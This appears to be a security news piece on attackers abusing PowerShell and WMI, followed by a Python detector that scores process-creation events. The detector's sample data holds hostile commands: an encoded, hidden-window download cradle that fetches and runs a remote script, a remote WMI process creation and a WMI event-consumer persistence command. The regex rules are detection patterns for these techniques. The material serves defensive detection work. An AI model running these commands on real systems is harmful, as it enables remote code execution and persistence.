Gbhackers
Cybercriminals Exploit Trusted Tools for Malware Deployment
Cybercriminals are increasingly using legitimate system tools such as PowerShell and WMI to deploy malware, producing stealthy intrusions that slip past signature-based defenses. The ANY.RUN Q1 2026 Cyber Risk report highlights a significant rise in loader-based attacks, which nearly doubled, alongside a 14.7% increase in credential theft and a 58.4% rise in Living-off-the-Land techniques. Attackers leverage these trusted tools to establish persistence quickly: the report puts the median time from initial execution to persistence at just 21 seconds. This trend complicates detection, because the same binaries produce the same process, script and WMI telemetry during routine administration, so malicious use blends into benign noise. Organizations are urged to adopt behavioral monitoring and anomaly detection that look for deviations in how these commands are invoked (encoded or hidden-window PowerShell, download cradles, unusual parent processes, WMI event subscriptions) rather than for the presence of the tools themselves. The report emphasizes rapid sandboxing and threat intelligence to shorten the window between first execution and response. As attackers continue to exploit trusted tools, robust detection and response strategies become critical.
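The behavioral monitoring the report calls for comes down to scoring how PowerShell and WMI are invoked rather than whether they run at all. The following is an added example written for this page, not code from GBhackers or from the ANY.RUN report: it decodes `-EncodedCommand` payloads, matches a small rule set against the decoded text, flags Office-to-LOLBin parent/child pairs and WMI event-subscription persistence, and scores each process-creation record. The event fields, rule names, weights and every sample event are constructed assumptions that merely resemble Sysmon EID 1 / Security 4688 data; they are not captured telemetry.

```python
"""Added example: score PowerShell/WMI Living-off-the-Land use in
process-creation telemetry. Illustrative code written for this page, not
ANY.RUN's or GBhackers' own tooling. Field names, rule names, weights and
all sample events are constructed assumptions."""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # parent process basename (cf. Sysmon ParentImage)
    image: str          # created process basename (cf. Sysmon Image)
    command_line: str   # full logged command line


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
# followed by base64 of a UTF-16LE script. -ea / -ep / -exec do not match this pattern.
ENCODED_ARG = re.compile(r"(?i)(?<![\w-])-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})")

# Assumed signal catalogue: (rule name, weight, pattern). Weights are illustrative.
RULES = [
    ("download_cradle", 2, re.compile(
        r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression")),
    ("stealth_flags", 1, re.compile(
        r"(?i)-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-noni(?:nteractive)?\b|-e(?:p|xec|xecutionpolicy)\s+bypass")),
    ("wmi_exec", 2, re.compile(
        r"(?i)wmic(?:\.exe)?\s.*process\s+call\s+create|Invoke-WmiMethod|Invoke-CimMethod")),
    ("wmi_persistence", 3, re.compile(
        r"(?i)CommandLineEventConsumer|ActiveScriptEventConsumer|__EventFilter|__FilterToConsumerBinding")),
]
WEIGHTS = {name: weight for name, weight, _ in RULES}
WEIGHTS.update({"encoded_command": 2, "suspicious_parent": 2})

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "mshta.exe", "wscript.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(event):
    """Return the ordered list of signal names that fire for one event."""
    findings = []
    text = event.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append("encoded_command")
        text = text + "\n" + decoded   # match rules against the payload, not just the wrapper
    for name, _, pattern in RULES:
        if pattern.search(text):
            findings.append(name)
    if event.parent_image.lower() in OFFICE_PARENTS and event.image.lower() in LOLBINS:
        findings.append("suspicious_parent")
    return findings


def score(event):
    """Weighted sum of the signals that fire for one event."""
    return sum(WEIGHTS[f] for f in analyze(event))


def triage(events, threshold=2):
    """Return (index, score, findings) for events at or above the alert threshold."""
    alerts = []
    for i, ev in enumerate(events):
        findings = analyze(ev)
        s = sum(WEIGHTS[f] for f in findings)
        if s >= threshold:
            alerts.append((i, s, findings))
    return alerts


# Constructed sample telemetry (not real captures). The encoded payload is built
# here the same way an attacker builds it, so the decoder gets realistic input.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcessEvent("svchost.exe", "powershell.exe",   # 0: scheduled admin script, benign
                 r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcessEvent("winword.exe", "powershell.exe",   # 1: macro -> hidden encoded downloader
                 f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"),
    ProcessEvent("cmd.exe", "wmic.exe",             # 2: WMI remote process creation
                 'wmic.exe /node:FILESRV01 process call create "cmd.exe /c whoami"'),
    ProcessEvent("cmd.exe", "powershell.exe",       # 3: permanent WMI event subscription
                 r'powershell.exe Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer '
                 r'-Arguments @{Name="Updater";CommandLineTemplate="powershell.exe -File C:\ProgramData\sync.ps1"}'),
    ProcessEvent("explorer.exe", "powershell.exe",  # 4: ordinary CIM query, benign
                 "powershell.exe Get-CimInstance Win32_OperatingSystem"),
]

if __name__ == "__main__":
    for idx, s, findings in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{s}] {ev.parent_image} -> {ev.image}: {', '.join(findings)}")
        decoded = decode_encoded_command(ev.command_line)
        if decoded:
            print("      decoded:", decoded)
```

Run as-is, the two benign events (scheduled script, CIM query) score zero, while the Word-spawned encoded downloader, the remote WMI process creation and the WMI event-consumer persistence all alert. The point of decoding before matching is that a download cradle hidden inside `-enc` is invisible to a rule that only looks at the raw command line; in production the same logic should also consume PowerShell script block logs (EID 4104), where the decoded script is recorded directly.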
Key Points:
• Cybercriminals are using trusted system tools to deploy malware stealthily.
• Loader-based attacks nearly doubled in Q1 2026, complicating detection efforts.
• Organizations must enhance behavioral monitoring to identify malicious use of legitimate tools.